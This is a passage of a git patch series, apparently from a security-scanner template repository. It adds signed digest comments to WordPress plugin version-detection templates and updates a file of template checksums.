4a0a00473045022007193b4c16021851037e35a5d178728f0757340decc18c0a071fbcc9fdcefc94022100e5253d73641df51891a8b6d57e7768bf8d3626a79c9c920bbf8e244cbda087c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df49..9d392cea994 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210087b90a19c44e0f1d898e1d2d7c0ed0952a489d6e4cc3c699c803761f50179b9702206a98b496d7d5fe808c26e2e55a4c75fde0d0211f362697edf75bc782a93ac93c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee0467..b50d724336c 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203ba059da1a3ad3b6d223ad26d4e392dd8f2091b81b1ea021918cd3a871b5e22402205ef6fcca57755650d979dac296f30a632661a2f19522551768930015c395bb53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0d..3474ab7c057 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220466a09cd2fbbba6352b449c5f9cb6861a6c3fab34b83d6845ac6feec7d9cfefe02200417046276f56f05c615561b925c4011fed8e895158334b7f2aaa43e4412e955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff55..849404e0d93 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fdd02cae6bb8e5aa34fd84636a1efa22133dc1dd77391cf093e76747fc09017302202636e537da6e35b85d2edb81d865cc19c8e57ca7e3973092a355b8e4721df20b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e3..603bdc81425 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c5fcaf0afe92479da6e90390343e73d7d9dd172747e0dec397bcc92b0794060702202f6babb2db792e318b4f5b8cd82c3aee6a822f97f8164a4b7e9f69eb176b23f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed6..b708e4b78f0 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026cca5baa6324684709df026ee1c82046cd760a2f8dd3efb7181f2b3aee3f0f302201746067f5ecafefb4908fade06d253fb6be18cb2722984c67c4c25ae52537ce5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a172..cb13303fdaa 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c8c5f8bf533ac8e1f14466637d4d1c1e60f46abb4dbce23cc980237509df83ac022059dbc4001995efe2ea081d11bf853e3a2deedeb56bbbf59cf3bc615da4b86c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afebd..b611d59ade1 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022023e9d60c3b15084a771997fca4a01dfce08af677e4d7bdfd3f256409888acdc4022100fd007492509c852a3b6b5828564efd1fff385559de08311ecac5f5888ccc2de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b49..89dd065a431 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207cc19dae8ac9fb8992d01107aea3b451d279845a044e58af3f9120d5943ee8e902207866eae44522a35d3606e5881941bc93ce18c9319005d9d3ce51ed0d8b4a9223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda1174..b03db6cfa94 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008a08564d2ecfc92a20cb04fff83073bbef91786295067d32646338909dc1d881022100e00222297554289c6a5d68738f1aa7181e906f5f2fe1d9828192b97eafbed7cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9bfb81ba7bb3b2916b0542d15ed4447fab8385a3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 17 Jul 2024 14:26:56 +0000 Subject: [PATCH 245/247] Auto Generated New Template Addition List [Wed Jul 17 14:26:55 UTC 2024] :robot: From 0dfb54b2845e93c43fb12509f1174fb7084c52f8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 14:27:03 +0000 Subject: [PATCH 246/247] Auto Generated Templates Checksum [Wed Jul 17 14:27:03 UTC 2024] :robot: --- templates-checksum.txt | 406 ++++++++++++++++++++--------------------- 1 file changed, 203 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dbcc5cf3aef..3292d3938b5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5002,7 +5002,7 @@ http/exposures/configs/wpconfig-aws-keys.yaml:960a11b79d35bc5a3b164fc7e426fb02b5 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880 http/exposures/configs/yii-debugger.yaml:d7c68b7d7e09cdd6933e07f4b0274cde60eb3671 http/exposures/configs/zend-config-file.yaml:f835fc3f4e814315144214f5bb0fe1a8cd178a71 -http/exposures/files/adcs-certificate.yaml:4eaec669c8a4fa91714bcf254c682581a83408df +http/exposures/files/adcs-certificate.yaml:8e107c896596e512bdf9b65da2ef6a985b8f822d http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017 http/exposures/files/apache-licenserc.yaml:2a3d72cad226944f1ecf05789504cc811b77e5bc http/exposures/files/apdisk-disclosure.yaml:2c1e02f1fe0bf0c57cc1baf6d1fa6712b32a1856 @@ -6896,7 +6896,7 @@ http/technologies/akamai-detect.yaml:e3f8ed7c09e39c12c794d4d93846d9fa204d1c1b http/technologies/ambassador-edge-stack-detect.yaml:fcb8fa46e689fb4d35bb7fbd4be87934dcf3ed38 http/technologies/angular-detect.yaml:7719617c08923ab10058ecbc5d9fe19ff7195d77 http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed2b -http/technologies/apache/airflow-detect.yaml:36837eb295b1c7ffced3d9864087d6dac52969dd +http/technologies/apache/airflow-detect.yaml:bf406c07ef9dfbaaa5d600d48db3b28ae7871511 http/technologies/apache/apache-answer-detect.yaml:48deef16a566d4847d23b77e4efcbc6d58690f8f http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd http/technologies/apache/apache-cloudstack-detect.yaml:c08888a73f19a2dd082a7a928862ac07de5c7a24 @@ -7294,229 +7294,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:e067e357c472bd8ec5d358b251598f9aa35fb4be +http/technologies/wordpress/plugins/add-to-any.yaml:b69f9439b1a0a3c527a7aff84049be886f631610 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:6cc322fd7909a000e67bf6b755c2ee69ce269c78 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:e76e42d907d888004ffeb85977b15917dbefa28d +http/technologies/wordpress/plugins/akismet.yaml:80cbce87a24f12d67c6aeaca046591d591fa20e7 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:9d2fa2ad57e8bd5ed29aed75ef913fb67b53749d +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:9dde6cd42c728a1ba85166e75cfb6a41ebda5036 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:967b5c493671d6431bea5ce64fa85e526d3a889e +http/technologies/wordpress/plugins/amp.yaml:3b024081d4036d1f44c787e7d76b6ad5fe6e8d77 +http/technologies/wordpress/plugins/antispam-bee.yaml:45a2231f58335862c0f28704903e02fd136de9ee +http/technologies/wordpress/plugins/astra-sites.yaml:31e0f2e1e49ce856e2525961699b54d49bbbb3f6 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:011bca8d1bbfd85fdbf957e21ee4f3e9590366f5 +http/technologies/wordpress/plugins/backwpup.yaml:6727c2a8698b7a9abacf148e6023370b95738d03 +http/technologies/wordpress/plugins/better-search-replace.yaml:b213320b4c7551c9fdc20fb0ec8276bdfe73b825 +http/technologies/wordpress/plugins/better-wp-security.yaml:dbddbcb23eb0f325a44dd2c620e1e44e702a860a +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:7fc65d6bb56e0e15ee0f8ae901f89da2c3ae10f9 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:ec411ffaad447876c81d6268b20edeeb52fabd90 +http/technologies/wordpress/plugins/breeze.yaml:08e5903ee95ee4e37b7cd68e29a1332ae5f72b0e +http/technologies/wordpress/plugins/broken-link-checker.yaml:a949d9f0572f79d9d2d319679944cb2ad786042d +http/technologies/wordpress/plugins/chaty.yaml:542e90f1b7fece08e36a22b0b461da5b2cd7274e +http/technologies/wordpress/plugins/child-theme-configurator.yaml:622776761bcba08eb7ead68230a6c9763d764402 +http/technologies/wordpress/plugins/classic-editor.yaml:4f42421e13c28213aa4a8008fc81fe44f40ba8ce +http/technologies/wordpress/plugins/classic-widgets.yaml:795af82f32035f99feffea5a95aba3f844f0daf2 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:27fc0c8be3979dd1f7b7047d5bf91af338247ef9 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:ec1cc6201cc78a92a9c66aee4159cf1cd72ef488 +http/technologies/wordpress/plugins/coblocks.yaml:7d10ea3193d3dee8324a98e9728c2e25c65a5494 +http/technologies/wordpress/plugins/code-snippets.yaml:ce7943cb86341eaee00d53f475b1f942a42d4b87 +http/technologies/wordpress/plugins/coming-soon.yaml:3ce0c1bb23832957e8e8f964d3ad6e5950151852 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:ea250332ccbbac354434e1efd95f9f147731c136 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:758acb18b74f907e7ee56754755abc04a18ff30c +http/technologies/wordpress/plugins/contact-form-7.yaml:b07e236f34aa44ba7810ae602950680de4a304db +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:80e3cb76543739cdce870383697aff07bb96cd44 +http/technologies/wordpress/plugins/cookie-law-info.yaml:0abbfc009a114b0a626c7a7bce97ed2247a69621 +http/technologies/wordpress/plugins/cookie-notice.yaml:7c6746459b03670d1751039775012aeeb0ed308b +http/technologies/wordpress/plugins/copy-delete-posts.yaml:5b97e6c996389e29e1b918e92f64b32394e17758 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:2e88a6149051bbf0e451fe03c7bf0346d8a50cf6 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:d3c500c590201da0a6c6a7723a5aed5418562151 +http/technologies/wordpress/plugins/custom-css-js.yaml:f7b1e1d2bb01b68bc6bc408e04c17fbc89bf4c5f +http/technologies/wordpress/plugins/custom-fonts.yaml:1791fdc0db0656191cbd0e1ff8c4475852846853 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:55a82b971d2a705ad3701f4a05064416646d612d +http/technologies/wordpress/plugins/disable-comments.yaml:8aee5e367999ad05f8d5ab0cfa242524c9a0b097 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:bbf25077af86b9d381004debbdd18d5548a66c67 +http/technologies/wordpress/plugins/duplicate-page.yaml:5c5113abe34fa40a6f21cfbd25539cf6ecb028e8 +http/technologies/wordpress/plugins/duplicate-post.yaml:3267eb33a319548414cc2550aa3a7945e63adae4 +http/technologies/wordpress/plugins/duplicator.yaml:2b4a61b86286eb244ce3fb77a3fb6de8d430f3e0 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:090d0d5a3b11c991cbefb7429d6b2b2a46cbeb60 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:63c2989eeac211b0dc91a2da72a09bfa26f032b3 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:9aaadbc157a942a10440785cbd6d8aa80bc25e39 +http/technologies/wordpress/plugins/elementor.yaml:2e4d10b4ff08d6ea5964f3ac1a8195c9744d9591 +http/technologies/wordpress/plugins/elementskit-lite.yaml:cca1c074b864f3d5c94937bd43e828c774e0c97d +http/technologies/wordpress/plugins/enable-media-replace.yaml:5fdb5d89bec6fd068934a30f0b8b1cee8c8f163a +http/technologies/wordpress/plugins/envato-elements.yaml:985f74fa1b59669fa595f9f5663e3738cbb1ae3a +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:9775303cf422471ea46f4a569a569a7fcfff6e38 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:7faabc428c83601a48b6b45196338f773cdb68fe +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:e4bfa703f615c586bf15b3ab637e6016191363f4 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:513731fe4aabb54658fd146b2534217bcb256108 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:8f27707106dfb61ed0c73d7ac4393fcaa010605e +http/technologies/wordpress/plugins/flamingo.yaml:4499ebd1420050bc4d86aebe99c083028ce3bc28 +http/technologies/wordpress/plugins/fluentform.yaml:53952e72dc35c8feb9f8739808894ed882fb019c +http/technologies/wordpress/plugins/font-awesome.yaml:63b6d44b534c9fd8dee1ea81ffd716c987bc2b6e +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:0b3a0d27e272c6950deff5f49e17c6814f987712 +http/technologies/wordpress/plugins/formidable.yaml:f06b9f12a7850db57e5f57dda4296811c299925c +http/technologies/wordpress/plugins/forminator.yaml:facf0e8bbc796322a08c63bf938c26ca10246efe +http/technologies/wordpress/plugins/ga-google-analytics.yaml:83978ec2f91546a6663a4c88c15179f3372a583b +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:3589c93816f9e05d3cfca2408e656406fc4062b0 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:d2a19ad3879e176c08dc68a02d7e26d6392b69b7 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:7ac55fe9ac13afb9ecff205149a061941b22576f +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4f7d3120e2bfe5555155b8e78031b84cc37040e7 +http/technologies/wordpress/plugins/google-site-kit.yaml:439dd6de9510c909a8c102c353329bc8f863c585 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:b26c751299867caba9d4aae857a11c25799f6520 +http/technologies/wordpress/plugins/gtranslate.yaml:8fd011f2396b29323896f16754aa504b1f036d02 +http/technologies/wordpress/plugins/gutenberg.yaml:a32a81de0d8a8abc1646c4dc48dd3d6656aa09c7 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:e9e741f7d54c6d3f48e7d272e3b4b0493034a582 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:73cef6de60def66b42aebcdc50021330113124c2 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:91f4c5a51b2b2cabf98932be7bceb56cffd196b6 +http/technologies/wordpress/plugins/header-footer.yaml:75e75d72e59f586249e99dbeb2a7b3899bbf9be9 +http/technologies/wordpress/plugins/health-check.yaml:3c2200b1aa0483543519be6ecbd0e1b1072a672a +http/technologies/wordpress/plugins/hello-dolly.yaml:6a9a2d558d6232fcfdee2745738226ea146c840f +http/technologies/wordpress/plugins/host-webfonts-local.yaml:8dc283cfe802277ece271f0b142d3eeb5c2466b6 +http/technologies/wordpress/plugins/hostinger.yaml:0c5bb65651142a15cb88dd192d52cd8bf3ced63c +http/technologies/wordpress/plugins/image-optimization.yaml:3ab3391345ecd3c57560839dd7aa453f91d614d0 +http/technologies/wordpress/plugins/imagify.yaml:8a5fc3096f4a8ecf0b8ee1eed59a2f91acdb38c8 +http/technologies/wordpress/plugins/imsanity.yaml:36c4a5dadefa9f97c6a3579fba41e1db148156bc +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:27558fa16920eeff4156998e6a743831ea26cbd6 +http/technologies/wordpress/plugins/instagram-feed.yaml:65e134aee3e82e8c36091b70f388bf9854aef1a0 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f49fe8fb33db7685b662c46c78ef6658d7092ea http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc 